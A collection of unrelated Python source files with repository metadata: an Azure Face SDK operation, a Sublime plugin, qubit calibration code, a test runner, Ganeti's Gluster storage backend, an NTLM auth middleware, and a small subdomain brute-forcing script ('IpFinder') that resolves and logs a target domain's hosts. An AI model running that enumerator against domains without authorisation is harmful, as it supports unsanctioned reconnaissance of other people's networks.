:type callback: Callable[Bytes, response=None]
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: PersistedFace or ClientRawResponse if raw=true
:rtype: ~azure.cognitiveservices.vision.face.models.PersistedFace or
~msrest.pipeline.ClientRawResponse
:raises:
:class:`APIErrorException<azure.cognitiveservices.vision.face.models.APIErrorException>`
"""
# Construct URL
url = '/facelists/{faceListId}/persistedFaces'
path_format_arguments = {
'AzureRegion': self._serialize.url("self.config.azure_region", self.config.azure_region, 'AzureRegions', skip_quote=True),
'faceListId': self._serialize.url("face_list_id", face_list_id, 'str', max_length=64, pattern=r'^[a-z0-9-_]+$')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
if user_data is not None:
query_parameters['userData'] = self._serialize.query("user_data", user_data, 'str', max_length=1024)
if target_face is not None:
query_parameters['targetFace'] = self._serialize.query("target_face", target_face, '[int]', div=',')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/octet-stream'
if custom_headers:
header_parameters.update(custom_headers)
# Construct body
body_content = self._client.stream_upload(image, callback)
# Construct and send request
request = self._client.post(url, query_parameters)
response = self._client.send(
request, header_parameters, body_content, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.APIErrorException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('PersistedFace', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
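# Illustrative usage sketch (not part of the generated client): the construction of
# `face_ops` below is hypothetical -- in practice this operations class is instantiated by
# the service client, which supplies the client, config, serializer and deserializer.
# The method names and arguments, however, are the ones defined above.
#
# face_ops = FaceListOperations(client, config, serializer, deserializer)
# face_ops.create('my-face-list', name='Demo list', user_data='created by example')
# face = face_ops.add_face_from_url('my-face-list', 'https://example.com/face.jpg')
# print(face.persisted_face_id)
# for face_list in face_ops.list():
#     print(face_list.face_list_id, face_list.name)
# face_ops.delete('my-face-list')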
|
lmazuel/azure-sdk-for-python
|
azure-cognitiveservices-vision-face/azure/cognitiveservices/vision/face/operations/face_list_operations.py
|
Python
|
mit
| 21,709
|
import sublime
import os
import sys
def plugin_loaded():
if sublime.platform() in ('linux', 'osx') and sublime.version() > '3000':
path = os.path.join(sublime.packages_path(), 'Codecs33', 'lib')
if path not in sys.path:
sys.path.append(path)
else:
print('Warning: Codecs33 is only working for Sublime Text 3 on linux or osx')
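# A small verification sketch (assumes it is run from the Sublime Text 3 console after
# the plugin has loaded): it simply checks that the bundled lib directory was appended.
#
# import os, sys, sublime
# print(os.path.join(sublime.packages_path(), 'Codecs33', 'lib') in sys.path)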
|
NemoChenTW/sublime-config
|
sublime-text-3/Packages/Codecs33/Codecs33.py
|
Python
|
apache-2.0
| 338
|
from .. import data_reduce
from ..ponyfiles.data_structures import *
def readout_passthrough(device, qubit_id, length, amplitudes):#, lengths):
readout_channel = [i for i in device.get_qubit_readout_channel_list(qubit_id).keys()][0]
adc, mnames = device.setup_adc_reducer_iq(qubit_id, raw=True)
adc.set_nop(int(device.get_sample_global('readout_adc_points')))
adc.set_nums(int(device.get_sample_global('uncalibrated_readout_nums')))
mean_sample = data_reduce.data_reduce(adc)
mean_sample.filters['Mean_Voltage_AC'] = data_reduce.mean_reducer_noavg(adc, 'Voltage', 0)
mean_sample.filters['Std_Voltage_AC'] = data_reduce.std_reducer_noavg(adc, 'Voltage', 0, 1)
mean_sample.filters['S21'] = data_reduce.thru(adc, mnames[qubit_id])
def set_amplitude(amplitude):
device.pg.set_seq(device.trigger_readout_seq+[device.pg.p(readout_channel, length, device.pg.rect, amplitude)])
# refers to Awg_iq_multi calibrations
metadata = {'channel': readout_channel, 'qubit_id':qubit_id, 'averages': device.modem.adc.get_nums(), 'length': length}
references = {'frequency_controls':device.get_frequency_control_measurement_id(qubit_id=qubit_id)}
if hasattr(device.awg_channels[readout_channel], 'get_calibration_measurement'):
references['channel_calibration'] = device.awg_channels[readout_channel].get_calibration_measurement()
def create_compression_dataset(measurement):
parameters = [MeasurementParameter(values=amplitudes[2:], name='amplitude', setter=False)]
measurement.datasets['compression'] = MeasurementDataset(parameters, np.zeros(len(amplitudes) - 2) * np.nan)
parameters = [MeasurementParameter(values=amplitudes[2:], name='amplitude', setter=False)]
measurement.datasets['cos_dist'] = MeasurementDataset(parameters, np.zeros(len(amplitudes) - 2) * np.nan)
measurement = device.sweeper.sweep(mean_sample,
(amplitudes, set_amplitude, 'amplitude'),
#(lengths, set_pulse_length, 'length'),
measurement_type='readout_passthrough',
metadata=metadata,
references=references,
on_start = [(create_compression_dataset, tuple())],
on_update = [(compression, tuple()),
(spread, tuple())])
return measurement
def spread(measurement, _):
zero_noise = np.mean(measurement.datasets['Std_Voltage_AC'].data[0,:])
zero_noise_std = np.std(measurement.datasets['Std_Voltage_AC'].data[0,:])
drive_amplitudes = measurement.datasets['Mean_Voltage_AC'].parameters[0].values[1:]
noise = measurement.datasets['Std_Voltage_AC'].data[1:,:]
additional_noise_ratio = np.mean(np.abs(noise-zero_noise), axis=1)/zero_noise_std
#print (additional_noise_ratio)
spread_point = np.argmax(additional_noise_ratio>2) ###TODO: statistics doesn't work this way, there is a cleaner way of checking
if np.any(spread_point):
measurement.metadata['additional_noise_appears'] = str(drive_amplitudes[spread_point+1])
else:
measurement.metadata['additional_noise_appears'] = 'nan'#ro_amplitude = drive_amplitudes[-1]
#print (spread/noise_spread)
def compression(measurement, _):
zero_response = measurement.datasets['Mean_Voltage_AC'].data[0,:]
drive_amplitudes = measurement.datasets['Mean_Voltage_AC'].parameters[0].values[1:]
signal = measurement.datasets['Mean_Voltage_AC'].data[1:,:]
noise = measurement.datasets['Std_Voltage_AC'].data[1:,:]
error = noise/np.sqrt(int(measurement.metadata['averages']))
signal_overlap = np.sum(np.conj(signal[0,:])*signal[1:,:], axis=1)/drive_amplitudes[1:]
cos_dist = np.sum(np.conj(signal[0, :])*signal[1:, :], axis=1)/np.sum(np.abs(signal[0, :]*signal[1:, :]), axis=1)
signal_overlap_estimate = np.real(signal_overlap[0])
signal_overlap_error = 0.5*np.sqrt(np.sum((np.abs(signal[1:,:])*error[0,:])**2, axis=1)+np.sum((np.abs(signal[0,:])*error[1:,:])**2,axis=1))/drive_amplitudes[1:]
#signal_overlap_estimate = (np.sum(np.abs(signal[0,:])**2) - np.sum(error[0,:]*np.abs(signal[0,:]))-np.sum(np.abs(error[0,:])**2))/drive_amplitudes[0]
#plt.figure()
#plt.plot(np.real(signal_overlap))
#plt.plot(np.sum(noise**2, axis=1)/adc.get_nums())
#plt.plot(signal_overlap_error)
compression = 10*np.log10(np.real(signal_overlap)/np.real(signal_overlap_estimate))
db_compression_point1 = np.argmax(np.abs(10*np.log10(np.real(signal_overlap)/np.real(signal_overlap_estimate)))>0.8)#-10*np.log10(1-signal_overlap_error/signal_overlap_estimate))
db_compression_point2 = np.argmax(np.max(cos_dist)-cos_dist>0.01)
if np.any(db_compression_point1) and np.any(db_compression_point2):
db_compression_point = np.min([db_compression_point1, db_compression_point2])
elif np.any(db_compression_point1):
db_compression_point = db_compression_point1
elif np.any(db_compression_point2):
db_compression_point = db_compression_point2
else:
db_compression_point = None
#10*np.log10(np.real(signal_overlap)/np.real(signal_overlap_estimate)),-1+10*np.log10(1-signal_overlap_error/signal_overlap_estimate)
#10*np.log10(np.real(signal_overlap)/np.real(signal_overlap_estimate))<-1+10*np.log10(1-signal_overlap_error/signal_overlap_estimate)
if db_compression_point is not None:
measurement.metadata['compression_1db'] = str(drive_amplitudes[db_compression_point+1])
else:
measurement.metadata['compression_1db'] = 'nan'
measurement.datasets['compression'].data[:] = compression[:]
measurement.datasets['cos_dist'].data[:] = cos_dist[:]
#print("Readout amplitude:",ro_amplitude)
|
ooovector/qtlab_replacement
|
qubit_calibrations/readout_passthrough.py
|
Python
|
gpl-3.0
| 5,395
|
from imp import new_module;
from sys import modules;
PyTest = modules["PyTest"] = new_module( "PyTest" );
from pytestsuite import *;
from pytestworld import *;
from pytesttracker import *;
from pytestverbosecui import *;
from pytestsimplecui import *;
from pytestmock import *;
class PyTestRunner:
def __init__( self, places, singleTest ):
self._singleTest = singleTest
self._world = PyTestWorld( places );
self._buildSuites();
def run( self ):
if self._world.loadFailed():
return ;
self._runSuites();
def _buildSuites( self ):
PyTest.suites = [];
for ( suiteName, suiteClass ) in PyTest.suiteClasses.items():
PyTest.suites.append( suiteClass() );
def _runSuites( self ):
self._setUpWrapper();
self._runSuiteWrapper();
self._tearDownWrapper();
def _setUpWrapper( self ):
PyTest.tracker.enterWorld( self._world.description() );
self._world.setUp();
def _runSuiteWrapper( self ):
for suite in PyTest.suites:
if self._singleTest:
suite._runSingleTest( self._singleTest )
else:
suite._run();
def _tearDownWrapper( self ):
self._world.tearDown();
PyTest.tracker.leaveWorld( self._world.description() );
def run( argv ):
if len( argv ) > 2 and argv[1] == "--verbose":
PyTest.ui = PyTestVerboseCui();
del argv[1];
elif len( argv ) > 2 and argv[1] == "--cui":
PyTest.ui = PyTestSimpleCui();
del argv[1];
else:
PyTest.ui = PyTestSimpleGui();
SINGLE_TEST = "--singleTest="
if len( argv ) > 2 and argv[ 1 ].startswith( SINGLE_TEST ):
singleTest = argv[ 1 ][ len( SINGLE_TEST ) : ]
else:
singleTest = None
places = argv[1:];
PyTest.tracker = PyTestTracker();
PyTest.mockTable = PyTestMockTable();
PyTest.runner = PyTestRunner( places, singleTest );
PyTest.runner.run();
if PyTest.tracker._testsFailed > 0:
exit( 1 )
__all__ = [ "PyTestRunner", "run" ];
if __name__ == "__main__":
from sys import argv;
run( argv )
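# Illustrative command lines (paths and test names are placeholders): argv[1] may carry an
# optional reporter or selection switch, and the remaining arguments are the places
# scanned for test suites.
#
# python pytestrunner.py tests/                             # default GUI reporter
# python pytestrunner.py --verbose tests/ more_tests/       # verbose console reporter
# python pytestrunner.py --cui tests/                       # simple console reporter
# python pytestrunner.py --singleTest=testSomething tests/  # selects a single test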
|
smsisko/Voodoo-Mock
|
pytest/pytestrunner.py
|
Python
|
gpl-2.0
| 2,161
|
#
#
# Copyright (C) 2013 Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
# TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Gluster storage class.
This class is very similar to FileStorage, given that Gluster when mounted
behaves essentially like a regular file system. Unlike RBD, there are no
special provisions for block device abstractions (yet).
"""
import logging
import os
import socket
from ganeti import utils
from ganeti import errors
from ganeti import netutils
from ganeti import constants
from ganeti import ssconf
from ganeti.utils import io
from ganeti.storage import base
from ganeti.storage.filestorage import FileDeviceHelper
class GlusterVolume(object):
"""This class represents a Gluster volume.
Volumes are uniquely identified by:
- their IP address
- their port
- the volume name itself
Two GlusterVolume objects x, y with same IP address, port and volume name
are considered equal.
"""
def __init__(self, server_addr, port, volume, _run_cmd=utils.RunCmd,
_mount_point=None):
"""Creates a Gluster volume object.
@type server_addr: str
@param server_addr: The address to connect to
@type port: int
@param port: The port to connect to (Gluster standard is 24007)
@type volume: str
@param volume: The gluster volume to use for storage.
"""
self.server_addr = server_addr
server_ip = netutils.Hostname.GetIP(self.server_addr)
self._server_ip = server_ip
port = netutils.ValidatePortNumber(port)
self._port = port
self._volume = volume
if _mount_point: # tests
self.mount_point = _mount_point
else:
self.mount_point = ssconf.SimpleStore().GetGlusterStorageDir()
self._run_cmd = _run_cmd
@property
def server_ip(self):
return self._server_ip
@property
def port(self):
return self._port
@property
def volume(self):
return self._volume
def __eq__(self, other):
return (self.server_ip, self.port, self.volume) == \
(other.server_ip, other.port, other.volume)
def __repr__(self):
return """GlusterVolume("{ip}", {port}, "{volume}")""" \
.format(ip=self.server_ip, port=self.port, volume=self.volume)
def __hash__(self):
return (self.server_ip, self.port, self.volume).__hash__()
def _IsMounted(self):
"""Checks if we are mounted or not.
@rtype: bool
@return: True if this volume is mounted.
"""
if not os.path.exists(self.mount_point):
return False
return os.path.ismount(self.mount_point)
def _GuessMountFailReasons(self):
"""Try and give reasons why the mount might've failed.
@rtype: str
@return: A semicolon-separated list of problems found with the current setup
suitable for display to the user.
"""
reasons = []
# Does the mount point exist?
if not os.path.exists(self.mount_point):
reasons.append("%r: does not exist" % self.mount_point)
# Okay, it exists, but is it a directory?
elif not os.path.isdir(self.mount_point):
reasons.append("%r: not a directory" % self.mount_point)
# If, for some unfortunate reason, this folder exists before mounting:
#
# /var/run/ganeti/gluster/gv0/10.0.0.1:30000:gv0/
# '--------- cwd ------------'
#
# and you _are_ trying to mount the gluster volume gv0 on 10.0.0.1:30000,
# then the mount.glusterfs command parser gets confused and this command:
#
# mount -t glusterfs 10.0.0.1:30000:gv0 /var/run/ganeti/gluster/gv0
# '-- remote end --' '------ mountpoint -------'
#
# gets parsed instead like this:
#
# mount -t glusterfs 10.0.0.1:30000:gv0 /var/run/ganeti/gluster/gv0
# '-- mountpoint --' '----- syntax error ------'
#
# and if there _is_ a gluster server running locally at the default remote
# end, localhost:24007, then this is not a network error and therefore... no
# usage message gets printed out. All you get is a Byson parser error in the
# gluster log files about an unexpected token in line 1, "". (That's stdin.)
#
# Not that we rely on that output in any way whatsoever...
parser_confusing = io.PathJoin(self.mount_point,
self._GetFUSEMountString())
if os.path.exists(parser_confusing):
reasons.append("%r: please delete, rename or move." % parser_confusing)
# Let's try something else: can we connect to the server?
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.connect((self.server_ip, self.port))
sock.close()
except socket.error as err:
reasons.append("%s:%d: %s" % (self.server_ip, self.port, err.strerror))
reasons.append("try running 'gluster volume info %s' on %s to ensure"
" it exists, it is started and it is using the tcp"
" transport" % (self.volume, self.server_ip))
return "; ".join(reasons)
def _GetFUSEMountString(self):
"""Return the string FUSE needs to mount this volume.
@rtype: str
"""
return "-o server-port={port} {ip}:/{volume}" \
.format(port=self.port, ip=self.server_ip, volume=self.volume)
def GetKVMMountString(self, path):
"""Return the string KVM needs to use this volume.
@rtype: str
"""
ip = self.server_ip
if netutils.IPAddress.GetAddressFamily(ip) == socket.AF_INET6:
ip = "[%s]" % ip
return "gluster://{ip}:{port}/{volume}/{path}" \
.format(ip=ip, port=self.port, volume=self.volume, path=path)
def Mount(self):
"""Try and mount the volume. No-op if the volume is already mounted.
@raises BlockDeviceError: if the mount was unsuccessful
@rtype: context manager
@return: A simple context manager that lets you use this volume for
short lived operations like so::
with volume.mount():
# Do operations on volume
# Volume is now unmounted
"""
class _GlusterVolumeContextManager(object):
def __init__(self, volume):
self.volume = volume
def __enter__(self):
# We're already mounted.
return self
def __exit__(self, *exception_information):
self.volume.Unmount()
return False # do not swallow exceptions.
if self._IsMounted():
return _GlusterVolumeContextManager(self)
command = ["mount",
"-t", "glusterfs",
self._GetFUSEMountString(),
self.mount_point]
io.Makedirs(self.mount_point)
self._run_cmd(" ".join(command),
# Why set cwd? Because it's an area we control. If,
# for some unfortunate reason, this folder exists:
# "/%s/" % _GetFUSEMountString()
# ...then the gluster parser gets confused and treats
# _GetFUSEMountString() as your mount point and
# self.mount_point becomes a syntax error.
cwd=self.mount_point)
# mount.glusterfs exits with code 0 even after failure.
# https://bugzilla.redhat.com/show_bug.cgi?id=1031973
if not self._IsMounted():
reasons = self._GuessMountFailReasons()
if not reasons:
reasons = "%r failed." % (" ".join(command))
base.ThrowError("%r: mount failure: %s",
self.mount_point,
reasons)
return _GlusterVolumeContextManager(self)
def Unmount(self):
"""Try and unmount the volume.
Failures are logged but otherwise ignored.
@raises BlockDeviceError: if the volume was not mounted to begin with.
"""
if not self._IsMounted():
base.ThrowError("%r: should be mounted but isn't.", self.mount_point)
result = self._run_cmd(["umount",
self.mount_point])
if result.failed:
logging.warning("Failed to unmount %r from %r: %s",
self, self.mount_point, result.fail_reason)
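# Illustrative usage sketch for GlusterVolume (the host, port and volume name below are
# placeholders, not defaults taken from this module): Mount() returns a context manager,
# so a short-lived operation can be wrapped as described in its docstring.
#
# volume = GlusterVolume("gluster.example.com", 24007, "gv0")
# with volume.Mount():
#     pass  # the volume is mounted at volume.mount_point here
# # the context manager unmounts the volume on exit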
class GlusterStorage(base.BlockDev):
"""File device using the Gluster backend.
This class represents a file storage backend device stored on Gluster. Ganeti
mounts and unmounts the Gluster devices automatically.
The unique_id for the file device is a (file_driver, file_path) tuple.
"""
def __init__(self, unique_id, children, size, params, dyn_params, **kwargs):
"""Initalizes a file device backend.
"""
if children:
base.ThrowError("Invalid setup for file device")
try:
self.driver, self.path = unique_id
except ValueError: # wrong number of arguments
raise ValueError("Invalid configuration data %s" % repr(unique_id))
server_addr = params[constants.GLUSTER_HOST]
port = params[constants.GLUSTER_PORT]
volume = params[constants.GLUSTER_VOLUME]
self.volume = GlusterVolume(server_addr, port, volume)
self.full_path = io.PathJoin(self.volume.mount_point, self.path)
self.file = None
super(GlusterStorage, self).__init__(unique_id, children, size,
params, dyn_params, **kwargs)
self.Attach()
def Assemble(self):
"""Assemble the device.
Checks whether the file device exists, raises BlockDeviceError otherwise.
"""
assert self.attached, "Gluster file assembled without being attached"
self.file.Exists(assert_exists=True)
def Shutdown(self):
"""Shutdown the device.
"""
self.file = None
self.dev_path = None
self.attached = False
def Open(self, force=False, exclusive=True):
"""Make the device ready for I/O.
This is a no-op for the file type.
"""
assert self.attached, "Gluster file opened without being attached"
def Close(self):
"""Notifies that the device will no longer be used for I/O.
This is a no-op for the file type.
"""
pass
def Remove(self):
"""Remove the file backing the block device.
@rtype: boolean
@return: True if the removal was successful
"""
with self.volume.Mount():
self.file = FileDeviceHelper(self.full_path)
if self.file.Remove():
self.file = None
return True
else:
return False
def Rename(self, new_id):
"""Renames the file.
"""
# TODO: implement rename for file-based storage
base.ThrowError("Rename is not supported for Gluster storage")
def Grow(self, amount, dryrun, backingstore, excl_stor):
"""Grow the file
@param amount: the amount (in mebibytes) to grow with
"""
self.file.Grow(amount, dryrun, backingstore, excl_stor)
def Attach(self, **kwargs):
"""Attach to an existing file.
Check if this file already exists.
@rtype: boolean
@return: True if file exists
"""
try:
self.volume.Mount()
self.file = FileDeviceHelper(self.full_path)
self.dev_path = self.full_path
except Exception as err:
self.volume.Unmount()
raise err
self.attached = self.file.Exists()
return self.attached
def GetActualSize(self):
"""Return the actual disk size.
@note: the device needs to be active when this is called
"""
return self.file.Size()
def GetUserspaceAccessUri(self, hypervisor):
"""Generate KVM userspace URIs to be used as `-drive file` settings.
@see: L{BlockDev.GetUserspaceAccessUri}
@see: https://github.com/qemu/qemu/commit/8d6d89cb63c57569864ecdeb84d3a1c2eb
"""
if hypervisor == constants.HT_KVM:
return self.volume.GetKVMMountString(self.path)
else:
base.ThrowError("Hypervisor %s doesn't support Gluster userspace access" %
hypervisor)
@classmethod
def Create(cls, unique_id, children, size, spindles, params, excl_stor,
dyn_params, **kwargs):
"""Create a new file.
@param size: the size of file in MiB
@rtype: L{bdev.FileStorage}
@return: an instance of FileStorage
"""
if excl_stor:
raise errors.ProgrammerError("FileStorage device requested with"
" exclusive_storage")
if not isinstance(unique_id, (tuple, list)) or len(unique_id) != 2:
raise ValueError("Invalid configuration data %s" % str(unique_id))
full_path = unique_id[1]
server_addr = params[constants.GLUSTER_HOST]
port = params[constants.GLUSTER_PORT]
volume = params[constants.GLUSTER_VOLUME]
volume_obj = GlusterVolume(server_addr, port, volume)
full_path = io.PathJoin(volume_obj.mount_point, full_path)
# Possible optimization: defer actual creation to first Attach, rather
# than mounting and unmounting here, then remounting immediately after.
with volume_obj.Mount():
FileDeviceHelper.CreateFile(full_path, size, create_folders=True)
return GlusterStorage(unique_id, children, size, params, dyn_params,
**kwargs)
|
andir/ganeti
|
lib/storage/gluster.py
|
Python
|
bsd-2-clause
| 14,117
|
#!/usr/bin/env python
import socket, itertools, sys, argparse, smtplib
print '''================================================
___ _____ _ _
|_ _|_ __ | ___(_)_ __ __| | ___ _ __
| || '_ \| |_ | | '_ \ / _` |/ _ \ '__|
| || |_) | _| | | | | | (_| | __/ |
|___| .__/|_| |_|_| |_|\__,_|\___|_|
|_|
@x86p3nguin
================================================'''
ipList = []
subdomains = []
itcnt = 0
parser = argparse.ArgumentParser()
parser.add_argument('-sM',
action='store_true',
help='Do not record the same IP address in the log.')
parser.add_argument('domain',
help='The domain to find IP addresses of.')
parser.add_argument('-cS',
nargs=1,
default='1',
help='The number of the character set to try.\n'+
' [1]-abcdefghijklmnopqrstuvwxyz --\n'+
' [2]-abcdefghijklmnopqrstuvwxyz. \n'+
' [3]-abcdefghijklmnopqrstuvwxyz0123456789\n'+
' [4]-abcdefghijklmnopqrstuvwxyz0123456789.\n'+
' [5]-aabcdeefghhiijklmnnoopqrssttuvwxyz00112233445566778899.\n'+
' [6]-aabcdeefghhiijklmnnoopqrssttuvwxyz')
args = parser.parse_args()
args.cS = int(args.cS[0])-1
if args.domain.startswith('.') == False:
args.domain = '.'+args.domain
charset = ['abcdefghijklmnopqrstuvwxyz',
'abcdefghijklmnopqrstuvwxyz.',
'abcdefghijklmnopqrstuvwxyz0123456789',
'abcdefghijklmnopqrstuvwxyz0123456789.',
'aabcdeefghhiijklmnnoopqrssttuvwxyz00112233445566778899.',
'aabcdeefghhiijklmnnoopqrssttuvwxyz']
print '['+ str(args.cS+1) +']', charset[args.cS]
for length in range(60):
for i in itertools.permutations(charset[args.cS],length):
i = ''.join(i)
if i in subdomains:
continue
subdomains.append(i)
if itcnt % 1000 == 0:
print i+args.domain, itcnt
try:
ip = socket.gethostbyname(i+args.domain)
print 'The IP address of '+i+args.domain+' is: '+ ip
if ip not in ipList:
if args.sM:
ipList.append(ip)
with open('ip.log', 'a+') as logFile:
logFile.write(ip+' '+i+args.domain+'\n')
except:
pass
itcnt += 1
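# Note / sketch (not part of the original loop): itertools.permutations never repeats a
# character beyond its multiplicity in the chosen character set, so common labels such as
# 'www' cannot be generated from the sets above. itertools.product is the usual way to
# allow arbitrary repeats, at the cost of a much larger search space:
#
# for candidate in itertools.product(charset[args.cS], repeat=3):
#     print ''.join(candidate) + args.domain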
|
x86penguin/IpFinder
|
ipFinder.py
|
Python
|
mit
| 2,271
|
# NTLMAuthHandler.py -- OpenChange RPC-over-HTTP implementation
#
# Copyright (C) 2012 Wolfgang Sourdeau <wsourdeau@inverse.ca>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
"""This module provides the NTLMAuthHandler class, a WSGI middleware that
enables NTLM authentication via RPC to Samba.
It works by proxying the NTLMSSP payload between the client and the samba
server. Incidentally, it could also be used against an MS Exchange service, but this
is untested.
"""
import httplib
from socket import socket, _socketobject, SHUT_RDWR, AF_INET, AF_UNIX, \
SOCK_STREAM, MSG_WAITALL, error as socket_error
from struct import pack, error as struct_error
import sys
from uuid import uuid4, UUID
from openchange.utils.packets import *
COOKIE_NAME = "ocs-ntlm-auth"
SAMBA_PORT = 1024
class NTLMAuthHandler(object):
"""
HTTP/1.0 ``NTLM`` authentication middleware
Parameters: application -- the application object that is called only upon
successful authentication.
"""
def __init__(self, application, samba_host="localhost"):
# TODO: client expiration and/or cleanup
self.client_status = {}
self.application = application
self.samba_host = samba_host
def _in_progress_response(self, start_response,
ntlm_data=None, client_id=None):
status = "401 %s" % httplib.responses[401]
content = "More data needed..."
headers = [("Content-Type", "text/plain"),
("Content-Length", "%d" % len(content))]
if ntlm_data is None:
www_auth_value = "NTLM"
else:
enc_ntlm_data = ntlm_data.encode("base64")
www_auth_value = ("NTLM %s"
% enc_ntlm_data.strip().replace("\n", ""))
if client_id is not None:
# MUST occur when ntlm_data is None, can still occur otherwise
headers.append(("Set-Cookie", "%s=%s" % (COOKIE_NAME, client_id)))
headers.append(("WWW-Authenticate", www_auth_value))
start_response(status, headers)
return [content]
def _get_cookies(self, env):
cookies = {}
if "HTTP_COOKIE" in env:
cookie_str = env["HTTP_COOKIE"]
for pair in cookie_str.split(";"):
(key, value) = pair.strip().split("=")
cookies[key] = value
return cookies
def _handle_negotiate(self, client_id, env, start_response):
# print >>sys.stderr, "* client auth stage0"
auth = env["HTTP_AUTHORIZATION"]
ntlm_payload = auth[5:].decode("base64")
# print >> sys.stderr, "connecting to host"
try:
server = socket(AF_INET, SOCK_STREAM)
server.connect((self.samba_host, SAMBA_PORT))
except:
print >>sys.stderr, \
("NTLMAuthHandler: caught exception when connecting to samba"
" host")
raise
# print >> sys.stderr, "host: %s" % str(server.getsockname())
# print >> sys.stderr, "building bind packet"
packet = RPCBindOutPacket()
packet.ntlm_payload = ntlm_payload
# print >> sys.stderr, "sending bind packet"
server.sendall(packet.make())
# print >> sys.stderr, "sent bind packet, receiving response"
packet = RPCPacket.from_file(server)
# print >> sys.stderr, "response parsed: %s" % packet.pretty_dump()
if isinstance(packet, RPCBindACKPacket):
# print >> sys.stderr, "ACK received"
client_id = str(uuid4())
self.client_status[client_id] = {"status": "challenged",
"server": server}
response = self._in_progress_response(start_response,
packet.ntlm_payload,
client_id)
else:
# print >> sys.stderr, "NAK received"
server.shutdown(SHUT_RDWR)
server.close()
response = self._in_progress_response(start_response)
return response
def _handle_auth(self, client_id, env, start_response):
# print >>sys.stderr, "* client auth stage1"
server = self.client_status[client_id]["server"]
# print >> sys.stderr, "host: %s" % str(server.getsockname())
auth = env["HTTP_AUTHORIZATION"]
ntlm_payload = auth[5:].decode("base64")
# print >> sys.stderr, "building auth_3 and ping packets"
packet = RPCAuth3OutPacket()
packet.ntlm_payload = ntlm_payload
server.sendall(packet.make())
# This is a hack:
# A ping at this stage will trigger a connection close
# from Samba and an error from Exchange. Since a successful
# authentication does not trigger a response from the server, this
# provides a simple way to ensure that it passed, without actually
# performing an RPC operation on the "mgmt" interface. The choice of
# "mgmt" was due to the fact that we want to keep this authenticator
# middleware to be reusable for other Samba services while "mgmt"
        # seems to be the only available interface from Samba outside of the
# ones provided by OpenChange.
packet = RPCPingOutPacket()
packet.call_id = 2
server.sendall(packet.make())
# print >> sys.stderr, "sent auth3 and ping packets, receiving response"
try:
packet = RPCPacket.from_file(server)
if isinstance(packet, RPCFaultPacket):
if packet.header["call_id"] == 2:
# the Fault packet related to our Ping operation
success = True
else:
success = False
else:
raise ValueError("unexpected packet")
except socket_error:
# Samba closed the connection
success = True
except struct_error:
# Samba closed the connection
success = True
server.shutdown(SHUT_RDWR)
server.close()
if success:
del(self.client_status[client_id]["server"])
# authentication completed
self.client_status[client_id]["status"] = "ok"
response = self.application(env, start_response)
else:
# we start over with the whole process
del(self.client_status[client_id])
response = self._in_progress_response(start_response)
return response
def __call__(self, env, start_response):
# TODO: validate authorization payload
# print >>sys.stderr, "starting request: %d" % os.getpid()
# old model that only works with mod_wsgi:
# if "REMOTE_ADDR" in env and "REMOTE_PORT" in env:
# client_id = "%(REMOTE_ADDR)s:%(REMOTE_PORT)s".format(env)
has_auth = "HTTP_AUTHORIZATION" in env
cookies = self._get_cookies(env)
if COOKIE_NAME in cookies:
client_id = cookies[COOKIE_NAME]
else:
client_id = None
# print >>sys.stderr, "client_id: %s (known: %s)" % (str(client_id), client_id in self.client_status)
if has_auth:
if client_id is None or client_id not in self.client_status:
# stage 0, where the cookie has not been set yet and where we
# know the NTLM payload is a NEGOTIATE message
response = self._handle_negotiate(client_id,
env, start_response)
else:
# stage 1, where the client has already received the challenge
# from the server and is now sending an AUTH message
response = self._handle_auth(client_id, env, start_response)
else:
if client_id is None or client_id not in self.client_status:
# this client has never been seen
response = self._in_progress_response(start_response, None)
else:
# authenticated, where no NTLM payload is provided anymore
response = self.application(env, start_response)
return response
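# Illustrative WSGI wiring sketch (the inner application and samba host below are
# placeholders): the middleware wraps another WSGI callable and only forwards requests to
# it once the NTLM exchange with the samba host has completed.
#
# def inner_app(environ, start_response):
#     start_response("200 OK", [("Content-Type", "text/plain")])
#     return ["authenticated\n"]
#
# application = NTLMAuthHandler(inner_app, samba_host="samba.example.com")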
|
inverse-inc/openchange.old
|
python/openchange/web/auth/NTLMAuthHandler.py
|
Python
|
gpl-3.0
| 8,856
|
#! /usr/bin/env python
# encoding: utf-8
# WARNING! Do not edit! https://waf.io/book/index.html#_obtaining_the_waf_file
import os,shlex,sys,time,re,shutil
